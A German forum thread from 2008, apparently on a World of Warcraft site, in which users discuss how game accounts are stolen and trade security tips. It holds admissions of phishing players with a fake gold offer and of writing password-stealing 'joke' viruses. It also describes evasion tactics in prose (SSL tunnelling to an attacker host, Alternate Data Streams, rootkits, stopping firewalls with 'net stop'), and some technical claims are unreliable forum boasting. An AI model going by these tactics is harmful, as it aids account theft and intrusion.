> bringen einem doch  sowieso nix... na kla... irgend n trojaner um daten auzuspähen, aber es gibt ja auch viren die den pc einfach nur zerstören oder chaos anrichten... da kannste ja noch nich mal das dumme gesicht sehn von dem denns erwischt hat...
> naja, mir solls egal sein, ich hab nen mac^^



Naja irgendwie muss den Windowsentwicklern ja klar gemaht werden, dass es so nicht geht. 
-auch überzeugter MAC user 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Mardoo (5. Februar 2008)

es gibt keine hacker, nur dumme menschen die ihre accdaten an andere weitergeben und die das aufm desktop in nen file speichern das wow passwörter heisst....

wer sowas macht ist sowieso so dumm, dass er auch auf komische perverse pornoseiten geht und sich da nen trojaner einfägt, weil er kein antivir geschweige denn eine firewall besitzt gelangen dann deine hübschen passwörter in die hände von fiesen gemeinen wow spielern die selber nichts besseres zu tun haben als deinen acc zu ''hacken''

OOOODER dein nickname ist dein wow-login; ich kenne das von vielen leuten, dass ihr acc genau gleich heisst wie ihr char...oder das PW, oder wie auch immer? 
Hat man den Login isses glaub nicht mehr so schwer für jemanden DER WIRKLICH VERZWEIFELT VERSUCHT EINEN WOW ACC ZU HACKEN, ihn dann auch schlussendlich zu hacken.

ich meine, er könnte auch zu dir nach hause kommen und dir das pw rausprügeln, aber das wär zu einfach denke ich.

jedenfalls, es gibt da so spezielle sachen die ihr kinder noch lernen müsst 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## Bloodflowers (5. Februar 2008)

jeNoova schrieb:


> Rätselraten!!^^
> 
> Es war auch kein Virus es war ein Wurm
> 
> ...



Wenn ich mir den Satz so anschaue glaube ich dir kein Wort ^^

Wurm = Virus


----------



## Makhral (5. Februar 2008)

@spochtl:
schöne ergänzungen zum thema, aber sei doch so gut und editiere die namentlichen verweise auf solche tools usw raus, das wirft ein schlechtes licht 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


@mardoo:
wer sowas macht würde auch nem leichten mädchen auf der reeperbahn seine ec-karte samt PIN geben xD^^

mfg


----------



## myS4D (5. Februar 2008)

Maelinda schrieb:


> Da in meinem bekanntenkreis (raid, gilde, freunde) immer wieder leute gehackt werden, hab ich mal ein wenig nachgefragt, was sie glauben, wie sie gehackt wurden. Da das aber nicht übermäßig viele sind und ich schon ganz gern wissen würde, wie die hacker das machen, möchte ich hier auch noch fragen, was ihr denkt oder wie es euch passiert ist.
> 
> Ich bitte euch ehrlich zu sein und hoffe auf zahlreiche antworten
> 
> ...



Glaube nicht das hier jeder reinschreibt wie er gehackt wurde und wie sowas geht...


----------



## Maelinda (5. Februar 2008)

So nachdem ich mir das jetzt lange angeschaut habe, schreib ich auch mal wieder was dazu 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Ich habe mein eingangspost bewusst etwas ... einfach gestaltet um so posts, wie sie ja jetzt hier gemacht wurden, ein wenig zu erzwingen 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 wobei ich sagen muss, dass es ein wenig aus dem ruder läuft.

Die grundidee ist durchaus ernst gemeint. und zwar will ich leute darauf sensibilisieren nicht jeden dreck im netz anzuklicken und mit offenen augen und immer skeptisch sich im netz zu bewegen, denn genau das ist der grund, warum so viele gehackt werden. (gehackt is ja eigentlich falsch, da hacker im ursprünglichen sinn keine bösewichte sind, sondern einfach leute, die sehr gute kenntnisse ihrer materie haben; nur weils hier schon mal angesprochen wurde ^^). ich will hier keine accounts selbst hacken; glaubt mir, das würd ich hier nicht reinschreiben 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 

Auf was ich hinaus wollte ist, dass ich immer wieder lese "mein account wurde gehack, ich bin so arm, tut was" und in wirklichkeit sind die leute in 99% der fälle selbst schuld, weil sie blind und gutgläubig durch die weltgeschichte geistern. ich will hiermit diejenigen anregen mal selbst etwas nachzudenken, die glauben ihnen kann sowieso nix passieren.

Noch ein paar kleine anmerkungen:

ein virenkiller alleine reicht AUF GAR KEINEN FALL! eine firewall ist ein muss, und scho alleine deswegen, damit ich die programme kontrollieren kann, die raus wollen, gar nicht mal so sehr irgendwas was rein will. ich selbst verwende nur eine firewall seit einiger zeit, nachdem ich gesehen hab, dass virenkiller nix bringen (wenn man auf seinen rechner aufpasst). wenn ihr einen virenkiller braucht, habt ihr schon was falsch gemacht (oder microsoft/windows ... grrr).
wer gold kauft, oder seinen account leveln lässt, ist einfach selbst schuld wenn er gehackt wird.
wer irgendwo im internet seine login daten angibt, der verdient es gehackt zu werden!

bedenkt auch, dass der login nicht durch irgendwelche bruteforce attacken rausgefunden wird, sondern über keylogger, welche programme sind, die ihr auf eurem PC installiert/ausgeführt haben müsst und das programm (meist eigentständig, oder?) muss dann auch noch eine verbindung ins netz haben, um die daten zu übertragen, was aber normalerweise die firewall rot blinken lassen muss. (wer das programm dann auch noch durchlässt, weil er nicht weiss was es ist, der hats auch verdient)

ich warte aber trotzdem noch immer auf leute, die mal ihren account gehackt gekriegt haben und hier erzählen, was sie glauben, was schuld war. es würd mich nach wie vor interessieren. da diejenigen, die ich bis jetzt ausgequetscht hab (und das muss man, weil keiner gerne drüber redet), konnten auch nicht genau sagen wieso und warum, allerdings fiel immer wieder der name "limewire". (darum auch der filesharing hinweis in meinem ersten post).

bitte bleibt ein wenig sachlich und macht hier keinen smalltalk oder flamed euch gegenseitig in grund und boden 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Also helft mir, gemeinsam die wichtigsten punkte zusammen zu fassen, bzw. die "sources" zu finden, wo man sich die keylogger einfängt, um den grünschnäbel mal mit der nase drauf zu stoßen, was sie einfach gar nicht machen dürfen.


----------



## Crash_hunter (5. Februar 2008)

jeNoova schrieb:


> Okay ich bin ganz offen und ehrlich zu dir,
> 
> habe früher mit einem Kumpel zusammen mal j4f WoW Accs gehackt ( Auch nichts damit gemacht, wollten nur gucken wie leicht es ist! ) Das ganze haben wir über eine phishing Seite gemacht und es gibt wirklich genug Idioten die darauf reinfallen, hier im Forum war letzt jemand der eine Phishing Seite gepostet hat, 2min. später war ein Thread eines Users auf der fragte wie er seinen acc wiederbekäme, der nähmlich gehackt war, da er auf die Seite geklickt hat und dort seine Acc Daten eingegeben hat.
> Wir hatten z.B den Trick benutzt das wir durch einen Bug im WoW System angeblich dem jenigen der seine Daten dort eingibt 5k Gold geben würde.
> ...




muhahahhaa nice 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 
Wenner nix gemacht habt war das mal ne geile action^^


----------



## TvP1981 (5. Februar 2008)

lape schrieb:


> Naja irgendwie muss den Windowsentwicklern ja klar gemaht werden, dass es so nicht geht.
> -auch überzeugter MAC user
> 
> 
> Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.



Auch Mac erwischt es so nach und nach. Bisher gibt es halt nur wenige Reporte über die Lücken,
vorhanden sind sie aber. Mittlerweile gelten Windowssysteme sogar als sicherer.


----------



## TvP1981 (5. Februar 2008)

jeNoova schrieb:


> Okay ich bin ganz offen und ehrlich zu dir,
> 
> habe früher mit einem Kumpel zusammen mal j4f WoW Accs gehackt ( Auch nichts damit gemacht, wollten nur gucken wie leicht es ist! ) Das ganze haben wir über eine phishing Seite gemacht und es gibt wirklich genug Idioten die darauf reinfallen, hier im Forum war letzt jemand der eine Phishing Seite gepostet hat, 2min. später war ein Thread eines Users auf der fragte wie er seinen acc wiederbekäme, der nähmlich gehackt war, da er auf die Seite geklickt hat und dort seine Acc Daten eingegeben hat.
> Wir hatten z.B den Trick benutzt das wir durch einen Bug im WoW System angeblich dem jenigen der seine Daten dort eingibt 5k Gold geben würde.
> ...


Du weißt aber schon, dass das ne Straftat ist, egal was du mit den erhaltenen Daten machst.


----------



## Faulmaul (5. Februar 2008)

um den ganzen 1337-h4ck0r-underground-szene-script-kiddies und sonstigen experten ihren glauben zu lassen: jo ihr habt alle recht; genau so läufts

und all jene die noch n bissl kritisch bleiben können:

phishing
social engineering
brute force

googlets nach und dann überlegt euch mal wie euch sowas treffen kann....
-"Hallo ich bin vom Blizzard Kundendienst, wir haben Unregelmäßigkeiten mit ihrem Account festgestellt und blablabla"
-"Goldgeschenk, geben sie ihre Kundendaten ein"
-"Hallo du kannst mir deinen Account borgen? ich muss n bissl farmen und hab keinen 70er" (net lachen; ich kenn leute die ihr konto herborgen *würg*)
-selbe Username/PW fürs WoW-Konto wie für community sites... 
-PW-Kombinationenen a la "123", "qwertz", "passwort" (jaja so was gibts immer noch zu hauf)

bevor jemand n trojaner platziert um einen keylogger nachzuziehen fragt er/sie erstmal ganz einfach.... und bekommt oft genug die richtigen antworten


----------



## Stonewhip (5. Februar 2008)

> social engineering


DAS ist das Stichwort. Viel zu schnell hat man (grad im MMOG) sog. "Freunde", die einem ja SOOOOO SEHR helfen (ingame)... 
Und das jemand der gehackt wurde zugibt, das er seinem "neuen Freund" Info's über seinen Account gegeben hat, ist arg unwahrscheinlich *lol?!?*

Ich zitiere hier mal Wikipedia, für alle die des englischen nicht so mächtig sind (GUT durchlesen und mal mit dem eigenen Verhalten vergleichen):


> Social Engineering [&#712;s&#601;&#650;&#643;l&#809; &#716;&#603;nd&#658;&#618;&#712;n&#618;&#601;&#633;&#618;&#331;] (engl. eigentlich „angewandte Sozialwissenschaft“, auch „soziale Manipulation“) nennt man *zwischenmenschliche Beeinflussungen mit dem Ziel*, unberechtigt an Daten oder Dinge zu gelangen. Social Engineers spionieren das persönliche Umfeld ihres Opfers aus, *täuschen falsche Identitäten vor* oder *nutzen Verhaltensweisen wie Autoritätshörigkeit aus*, um Dinge wie geheime Informationen oder unbezahlte Dienstleistungen zu erlangen. Meist dient Social Engineering dem Eindringen in ein fremdes Computersystem, um vertrauliche Daten einzusehen; man spricht dann auch von Social Hacking ['hæk&#618;&#331;] (vgl. Hacker).


Na, klingelts bei einigen?? - Ich hoffe sehr...

MfG

PS: und da gilt auch nicht die Ausrede: "Ich hab mir dem aber im TS gesprochen!..." - Mit WEM habt ihr gesprochen ??

EDIT:


> bevor jemand n trojaner platziert um einen keylogger nachzuziehen fragt er/sie erstmal ganz einfach.... und bekommt oft genug die richtigen antworten


Genau so sieht's aus. TS-Gespräche wie "Und was hast Du für 'n Rechner?" führen rasend schnell zu einer vollkommenen (ungewollten) Offenbarung der eigenen Computer- und Sicherheitsstruktur. Schon hat man die Schlüssel aus der Hand gegeben...


----------



## Cenarias (5. Februar 2008)

in Windows gibt es ehn Spionage toll von Ms das für ms datensammelt das is die perfekte vorraußsetzung dafür.


----------



## el_nappo (5. Februar 2008)

Mac + Sicheres Passwort = Unbesiegbar 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## vyn (5. Februar 2008)

cazimir schrieb:


> hmmm wie hies noch einmal dieser Trojaner der sich innerhalb von 3 Tagen um die halbe Welt gefressen hat und dann ist der Rechner regrlmäßig runtergefahren(wenn man einen Dienst nicht abgestellt hat)? Also ich finde eine Internetverbindung zu haben ist nicht holen...



dem spieler werden 100 punkte abgezogen, da die antwort falsch ist!

wie schon von mehreren bemerkt war das weder trojaner, noch virus, sondern ein wurm und dieser hiess damals nimda, wovon heute noch verschiedenste und neue versionen auftauchen.

und dass man da nicht schuld sein kann, stimmt auch nicht!
es gab diejenigen, welche ihn sich manuell gezogen haben... der schuldige ist klar!
der wurm wurde aber auf grund eines windows update von microsoft geschrieben, welches eine lücke im system schliessen sollte. diese lücke wurde durch den nimda ausgenutzt. der schuldige war also derjenige, welcher sich die updates nicht sofort installiert hat... also wieder jeder selbst!

die sache mit der it security ist halt immer ein kompromiss zwischen datenschutz und komfort, welchen jeder selbst für sich zu finden hat. umso mehr sicherheit, umso weniger komfort usw


----------



## Faulmaul (5. Februar 2008)

vyn schrieb:


> dem spieler werden 100 punkte abgezogen, da die antwort falsch ist!



ach komm sei nich so hart mit ihm; er ist doch n "experte"



vyn schrieb:


> und dass man da nicht schuld sein kann, stimmt auch nicht!



boah endlich mal sagt das jemand anders auch;

wer sich solchen drek (ja ohne "c" einfängt) der hats sich ja wohl selber eingebrockt;

und jetzt eins an alle diese Pappnasen und selbsternannten Security-Spezialisten bzw H4x0rs und Underground-Szene-Leute (der hat sicher die Londoner Ubahn gemeint... hat wohl dort n paar Jahre genächtigt); hier so klugzuscheissen ist echt das geilste was ihr tun könnt, ich lach mich eben halbdeppert über die Posts hier.  


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 

je mehr ihr redet desto mehr gebt ihr eure Unwissenheit preis... das schlüsselwort heisst zuhören...


----------



## Stonewhip (5. Februar 2008)

Faulmaul schrieb:


> und jetzt eins an alle diese Pappnasen und selbsternannten Security-Spezialisten bzw H4x0rs und Underground-Szene-Leute (der hat sicher die Londoner Ubahn gemeint... hat wohl dort n paar Jahre genächtigt); hier so klugzuscheissen ist echt das geilste was ihr tun könnt, ich lach mich eben halbdeppert über die Posts hier.


+



Faulmaul schrieb:


> je mehr ihr redet desto mehr gebt ihr eure Unwissenheit preis... das schlüsselwort heisst zuhören...


=




			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## cazimir (5. Februar 2008)

Naja die Vorposter waren schneller, aber ich will den Link trotzdem mal posten 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


http://de.wikipedia.org/wiki/Social_Engineering
bzw. mittlerweile
http://de.wikipedia.org/wiki/Phishing
Ist wohl in den meisten Fällen die erste Stufe.
Generell ist es nicht verkehrt sich über Sachen wie Viren, Würmer, Trojaner, Cracken, Phishing, Social Engineering und Co. zu informieren. Wer sich wirklich für seine Sicherheit interessiert sollte einfach Googeln 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Und an die letzten 3:



vyn schrieb:


> die sache mit der it security ist halt immer ein kompromiss zwischen datenschutz und komfort, welchen jeder selbst für sich zu finden hat. umso mehr sicherheit, umso weniger komfort usw


So ist es.

mir ist schon klar, dass es ein "Wurm" und kein "Virus" war, ich habe nur "Virus" als Überbegriff(was falsch ist) benutzt. Das Windowsupdate war damals nicht im Autoupdate drin, was es ermöglicht hat, dass der sich so schön verbreiten konnte. Also war manuell updaten angesagt(was wohl nicht jeder dan ganzen Tag macht).

und speziell an Faulmaul und Co.:

schreibt lieber was sinnvolles ...
ich hab nie gesagt, dass ich ein Experte bin, ich sage nur das, was ich mitbekommen habe.



Naja es macht wohl hier ehr selten Sinn, ein Thema ernsthaft zu diskutieren.


Edith sagt: Sorry Stonewhip, hab dich falsch verstanden, nehme alles über dich zurück.


----------



## Stonewhip (5. Februar 2008)

Ich wollte mit meinen Posts sicherlich nicht provozieren, konnte es mir aber nicht nehmen lassen, "Faulmaul" mal daruf hinzuweisen, das er/sie hier die Klappe (grad in seinem letzten Post) am weitesten aufreißt, und dann den Post mit "_je mehr ihr redet desto mehr gebt ihr eure Unwissenheit preis... das schlüsselwort heisst zuhören..._" beendet (!) *rofl?*

Er hat vielleicht ein paar nützliche Dinge von sich gegeben, soll aber nicht erwarten, das letzte Wort haben zu dürfen/gehabt zu haben.

Das Thema ist sicherlich ernst. Leider sehen zu viele nicht, das sie selber Schuld an ihrer Misere sind, und versuchen dann hier, ihren Frust loszuwerden. Das ist auch nicht die netteste Art.

MfG


----------



## Spochtl (5. Februar 2008)

Makhral schrieb:


> @spochtl:
> schöne ergänzungen zum thema, aber sei doch so gut und editiere die namentlichen verweise auf solche tools usw raus, das wirft ein schlechtes licht
> 
> 
> Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.



Gerade weil jemand es lesen soll schreibe ich die Namen der Seiten hin. Jeder der Google mächtig ist kann diese Seiten finden. Ich hab keine Links oder Namen zu Programmen gegeben, sondern die Namen der gängigsten Securitysites die man kennen sollte. Jeder der Google aufmachen kann, kann auch mit einfachen Suchbegriffen solche Seiten finden und auch entsprechende Kinderseiten. Wissen schafft man auch nicht dadurch das man es zurückhält und verkauft, sondern öffentlich macht damit jeder Lernen kann. In dem Fall geht es darum was es für möglichkeiten gibt und das man sich einprägt sowas zu vermeiden.

Linux oder ein BSD zu installieren ist zwar ganz schön, habt Ihr aber schonmal per Cedega versucht Spiele wie WoW zu starten? Der Otto-Normal Benutzer ist doch überfordert mit der Installation, er findet seinen Arbeitsplatz nicht mehr weil es keinen gibt und googelt sich die Finger wund wo man in einem Linux/BSD das Laufwerk C: findet 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


Klar wäre es ein besseres System um einfach zu surfen, Mails abzurufen etc. Aber zocken tun wir doch 99,9999% unter Windows. Ich muss sagen das ich auch lieber unter Windows zocke, alleine der Geschwindigkeitsvorteil ist immens gegenüber der Emulation. Aber das wars auch unter Windows bei mir, mehr habe ich nicht mehr installiert. Windows ist nur zum Zocken und entsprechend abgespeckt. Mein Intranet Server hat Snort und honeyd, und da alles über die Kiste geroutet wird, fällt ein Virus auch entsprechend schnell auf. Ausser der Virenauthor war intelligent und baut mit dem Virus einen SSL Tunnel auf den HTTPS Port (443 TCP) auf um den Verkehr darüber zu leiten oder zu kontrollieren, dann dauert es schon etwas bis ich das rausfinde. Aber das ist noch nicht die Regel. Wobei Stormbot solche Taktiken schon einsetzt, was auch zur Unangreifbarkeit des kompletten Botnetzes beiträgt.



> in Windows gibt es ehn Spionage toll von Ms das für ms datensammelt das is die perfekte vorraußsetzung dafür.



Ich weiß zwar nicht an was du dabei denkst, aber MS hat nie solchen Spionage Tools im System verbaut. Alexa war bis Windows 2000 und XP ohne SP dabei,aber war nie zum Spionieren ausgelegt (bzw. nur für Microsoft). Jeder der behauptet Windows bringe solche Programme mit, kennt sich nicht aus oder beweist das Gegenteil.
Rootkits nutzen im übrigen auch nur die Treiber API vom Windows Kernel und erweitern das System durch Funktionen die einen Trojaner / Wurm verstecken, was im Endeffekt einfacher zu lösen ist als wenn der Trojaner eine solche Funktion mitbrächte. Das verstecken im Taskmanager oder Process Explorer (defakto standard bei mir) ist nicht unkompliziert, daher nimmt man sich ein Beispiel an den Linux/BSD Rootkits die es schon viel länger gibt, und versteckt einfach die entsprechende Process ID vor den Userspace Tools. Da alle Anfragen vom Kernel behandelt werden, ist es nicht sehr schwierig sowas zu lösen OHNE die Tools abzuändern und den Admin zu Alarmieren. Vorrausgesetzt jemand aktiviert Brain 1.0 und sucht nach den Windows Internals in der Microsoft Developer Database oder liest mal das Buch Rootkits von Addison Wesley.
Wie bekommt man einen Rootkit runter? Man macht einen Dump des Dateisystems und sichert diesen. Dann startet man ein Live System, z.B. Kubuntu Linux und vergleicht den Dump mit dem echten Festplatteninhalt. Die MFT kann man nicht so abändern das Dateien auch in einem Linux nicht gefunden werden können. Läuft schneller als wenn ich Rootkit Revealer verwende und genauso sicher. Da der Rootkit ja nur im Infizierten System installiert ist, kann er folglich nicht unter dem Live System etwas verstecken und man findet die Programme/DLL´s. 
Ach so, Ausname ist irgendwie die youshouldntseeme.exe , die hing bei mir ab und zu mal beim runterfahren. Hab ich nie gefunden, wird anscheinend zur Laufzeit erstellt und gelöscht.

So, dann kam noch FreeBSD und Netfilter und co.
Weiß ja nicht WER auf den Trichter kommt, aber Netfilter auf BSD läuft erstens nicht, dafür gibt es ipfw und diese lässt Packete auch durch wenn sie böse sein. Den Zielports wie 80, 443, 110, 25 etc. sind immer offen. Wer denkt er wäre durch einen Packetfilter geschützt, setzen 6.
Packetfilter machen genau das, sie Filtern Packete nach gewissen Regeln die man erstellt. Möchte ich Mails abrufen, muss ich Port 110 bzw. 143 TCP freigeben, möchte ich Mails versenden, Port 25 TCP. Möchte ich Surfen muss ich 80 und 443 TCP öffnen. Wie ich oben schon gesagt habe, ist es dank hunderter Cryptolibs im Netz mehr als einfach seinem Programm SSL beizubringen, dann Tunnel ich eben den Spaß durch den Port 443 zu evil-hacker.ru, selbiges gilt für alle anderen SSL basierenden Verbindungen wie imaps (993 TCP) oder  pop3s (995 TCP). Sperre ich alle Highports (alles über Port 1024) wird NAT ein ziemliches Problem.
Am Ende habe ich leicht und locker meine 100 Regeln die mir nichts bringen weil sich ein Virus via Alternate Data Stream (vielen dank Microsoft für diese Unsinnige Funktion) an ein Vorhandenes Programm "anhängt" und seine Daten darüber verschickt, das ist sogar für die meisten Freeware Firewalls und teile der Kommerziellen Firewalls unsichtbar, genauso wie Virenscanner. Beliebt ist alles was automatisch startet, da ändert das Virus einfach das Startkommando und schon hängt es an ICQ mit dran. Im Packetfilter sind die ICQ Ports erlaubt, die Personal Firewall ist blind, Virus ist draussen. Zur Zeit hat Windows WIEDER ein Problem mit Bildern. Es ist wieder möglich ein Bild zu "bauen" (im Hexeditor) das ein Programm ausführt und wieder (ADS sei dank) mit höheren Rechten als es sollte. 
Personal Firewalls und Virenscanner sind eigentlich unnütz. Packetfilter nutzen auch nur bedingt etwas, dann nehmlich wenn ein Virus zu einem gesperrten Port raus möchte. Was aber nur noch Kinderviren betrifft. Router sind nützlich weil sie eine vorgeschaltete Firewall haben, dadurch können Viren die eine automatische Verteilung und Infektion über Angreifbare Ports handhaben nicht greifen. Der Anschluss ist belegt, der Rechner geschützt. Sasser hat zum Beispiel msrpc 135 TCP genutzt um sich zu verbreiten, und es ist immernoch unterwegs. Ein Router verhindert das.

Zu Social Engeneering sage ich nix mehr, das hat einer der Vorredner schon schön erklärt. Wer so dähmlich ist und das selbe Passwort ÜBERALL nimmt, tja, der ist selbst schuld. Wer es noch weitergibt, dummheit muss bestraft werden. Es gibt allerdings ein Trick, der nur nicht immer funktioniert. Tippt als Passwort Nichtdruckbare Zeichen ein oder etwas was nicht auf der Tastatur ist. Diese Symbol z.b. ž bekommt man wenn man ALT+0158 drückt. Funzt nicht überall, aber ich will den Passwortcracker sehen der das Zeichen rausfindet 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


Ansonsten nehmt einen Satz wie: Ich hab ein neues schönes Passwort, knack das erstmal!
und dann den Anfangsbuchstaben: IhensP,kde! <-- ist das nicht ein Passwort das in keinen Dictionary steht und entsprechend solche Angriffen Stand hält? Und es ist leicht zu merken. Iterationen wie in Leetspeak / L33tsp34k oder rückwärts schreiben, Satzzeichen ändern etc. machen aus diesem simplen Passwort noch locker 10 weitere. Man kann sich auch Passwörter bauen die auf Programme oder Seiten zugeschnitten sind, die vergisst man nie und die sind immer einzigartig.

Huch, da war noch was von wegen Datenschutz und Sicherheits ist ne Gratwanderung. Geb ich dir im ersten moment Recht, aber auf was genau beziehst du dich? Das Bundesdatenschutzgesetz ist wirklich kein Spaß,  dann kommen noch die Bücher aus der Telekommunikation dazu und schon darf ich nichtmal mehr eine Spammailer mehr aussortieren, den der Inhalt einer Mail ist vertraulich und muss auch so behandelt werden. ein Postmann kuckt ja auch nicht in deine Briefe und wirft Sie für dich gleich in die Grüne Tonne oder haut nen Werbung Stempel drauf 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Mac und sicher, ja der Spaß war gut. Macs sind zwar sicherer als Windows, aber auch erst wenn man wirklich JEDEN unnötigen Dienst abschaltet. Sucht mal nach der Hack a Mac day Aktion bei Google, glaub die Kiste war keine Stunde im Netz bis der erste root rechte besaß. Soviel zu Apples Sicherheitsverhalten, die geben auch nur Patches raus wenn Sie lustig sind. Genauso wie Microsoft mit Ihrem Patchday. Ich hab immernoch ca. 20 0-Day Exploits die für Apple oder Windows laufen aus der Full Disclosure Mailingliste.

So, wer Rechtschreibfehler findet, ich schiebs auf mein Unterzucker 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.


----------



## KnuP (6. Februar 2008)

Spochtl hab nicht alles gelesen aber hab mal garkeine ahnung von so was, aber linux instalieren ist leicht, dann noch mit dem programm was schon drauf ist wählen das man "wine" instalieren will. danach kanste so fern du nicht zu doof bist deine festplatte zu finden (was mit dem neun kde (ist ne benutzer oberfläche) sehr einfach ist) 
dann muste nur noch doppel klick auf  wow.exe machen und das leuft *g*!
und laufen tuht es auch genau so schnell! 
nur past mir net das er nicht richtig die 4und 5 maustaste nimmt was man aber sicher einstellen kann^^ 

und "Brute Force Angriffe" habe wie gesagt keine ahnung aber hab mal vom kumpel gehört das es netzwerke gibt die das machen und sich sozusagen absprechen wer was ausprobiert dann sollte das auch bei wow gehn oder? oder hatt man da nur 3 versuche oder so egal von wo man probiert?  naja aber ist warscheinlich auch recht aufwändig denke ich ...

und ja rechtschreib fehler sind auch genung^^


----------



## nam3less (3. März 2008)

Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        

 http://brain.yubb.de/


----------



## Shurycain (3. März 2008)

zum thema hacken: ich schreibe manchmal kleine viren, um ICQ Pw´s von kumpelz zu zergen, oder Skripts die ihre Pc rebotten lassn (Ich lach mir dann imma den arsch ab, wenn mein kumpel plötzlich off ist). Der "Kick" daran ist einfach, solang zu coden bis man es entlich geschafft hat, und dann freud man sich. Ähnlich wie beim WoW zocken, da arbeitet man ja auch auf etwas hin, und wenn man es geschafft hat, freud man sich. und meine "späße" richten ja auch ned wirklich schaden an 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        


ps: Ich hab ned wirklich ahnung von sowas, ist nur ein bisschen rumprobieren, also mir jetz keine mails senden von wegen "Meine Freundin hat mich betrogen, ich möchte nur wissn..." BLABLABLA


----------



## Manitu2007 (3. März 2008)

schon gewust jeder von euch benutzt den Größten Virus der Welt "Windows" noch fragen?


----------



## Marakesh2k5 (3. März 2008)

Navyraiser schrieb:


> alsoo ich war ca. n halbes jahr in der underground szene hab zwar keine wow accounts gehackt aber naja..eins vorweg wenn dich wirklich jemand hacken will denn schafft derjenige es auch. in den meisten fällen wird es durch trojaner gemacht das sind kleinste datein ca. 300kb groß diese stecken sie in große datein wie z.b. mp3s bieten diese als download an.. du lädst diese runter klickst auf den mp3 (trojaner) und du bist hacked. der jenige der den trojaner on gestellt hat hat vollen zugriff auf dein pc kann sehen was du schreibst (keylogger) kann datein von deinem pc laden datein auf dein pc mache z.b. neue viren etc. und sonmit kann derjenige auch ganz leicht die wow daten "besorgen". ich will jetzt kein roman schreiben deswegen geb ich dir jetzt ein paar tipps.. firewall: windows firewall reicht antivir: ich benutze antivir reicht vollkommen damit scannst du deine dateien die du dir geloadet hast bevor du diese nur anklickst filesharing: nicht sehr ratsam falls ja pass auf was du loadest und scann die datein bevor du diese benutzt. internetbrwoser: is egal nach deiner wahl. das aller wichtigste ist geh auf keine seiten die dir nicht vertraunswürdig erscheinen lad keine datein herunter die dir nicht vertraunswürdig erscheinen. leute die dich einfach bei icq adden und dir datein senden ..NICHT anehmen ganz klar. zum schluss nochmal pass auf wo du dich im www bewegst und denk dran wenn jemand dich hacken will schafft derjenige es auch.
> 
> rechtschreibfehler könnt ihr behalten
> 
> ...




ich hab noch nie so viel müll gelesen wie das ^^

erstens .. MP3s sind KEINE Dateien worin man Trojaner rein packen kann ... es geht einfach nicht weil wegen Technisch unmöglich.

Und wenn dann meist mit so super tricks wie test.mp3                                               .exe ^^ noobmäßig halt

zweitens . vernünftige account hacks passieren sicher nicht über trojaner .. omfg ^^ gut , wenns nen 12 jähriges kind was grad nen "trojaner baukasten" entdeckt hat ist dann ja ^^.

Windows Firewall reicht ? wie geil alter viel spaß bei nem angriff .. die kannste so einfach ausschalten so schnell kannste nicht mal gucken und du willst in der underground scene gewesen sein ? dass ich nicht lache , underground kindergarten evtl ^^

Erstmal .. gegen jeden Trojaner oder sonstige Programme die von eurem PC aus eine verbindung woanders hin herstellen will gilt : FIREWALL !! und zwar keine 0815 firewall wie zonealarm oder so nen rotz sondern am besten direkt eine Hardware Firewall wie sie in jedem guten Router zu finden ist.

Antivir ist genau so ein müll wobei selbst das beste Anti Viren Programm nichts nutzt wenn der Trojaner oder Keylogger oder wie auch immer vernünftig programmiert wurde und nicht mit so "One klick pwn3r trojaner patcher" bearbeitet wurde ^^

Desweiteren gilt , macht euer Passwort so lang wie nur irgendwie möglich und vor allem lasst es keinen sinn ergeben. Der name eurer freundin oder eure handynummer wird euch hier nicht grade schützen. nehmt lieber passwörter wie "465rsGF5ertfDFs5w" oder sonst was .. scheiße zu merken aber sicher 


			Dieser Inhalt steht nur eingeloggten Mitgliedern zur Verfügung.
        



Außerdem bindet nicht jedem im Game direkt auf die Nase wer ihr seit .. also euren kompletten namen , familiengeschichte oder sonst was ... Social Energiing ist die verbreitetste methode um an eure PW Frage zu kommen oder sonstiges.

Und wie jedem bekannt sein sollte .. ladet euch nicht irgendwelche vermeindlichen "uber pwn1ng god mode hacks" runter .. gibt es nicht und wird es auch niemals geben. genauso wie ihr euch überhaupt von solchen seiten fern halten solltet .. denn auch hier kann man im SourceCode der Seite Sachen einbauen die automatisch irgendwelche scripte starten und trojaner etc runter laden und starten ....

Und bitte Leute ... schmeißt den Internet Explorer weg ^^ nutzt Firefox oder irgend einen anderen sicheren iNeT browser , das teil hat mehr löcher als ein Käse.


Solltet ihr der Firewall von eurem Router immernoch nicht genug trauen könnt ihr noch in der Netzwerk einstellung nur bestimmte Ports öffnen .. dies ist meist besser als irgendwelche billig firewall programme die per normaler DOS command eingabe zu deaktivieren sind (net stop <ServiceName>) Kann aber auch zu mehr Problemen führen. Also nutzt dies mit bedenken ...


Ich könnt ja jetzt auch einen raushängen lassen von wegen "blabla underground scene" aber da man es glaube ich heraus lesen kann dass ich bissl mehr plan von sicherheits technik habe als der kollege aus dem zitat erübrigt sich das wohl ..

In diesem sinne nochmal ein fettes danke für den brüller des Tages ... Windows Firewall und sicher .. nee ey


PS . Es gibt Trojaner die haben grad mal 1 KB 


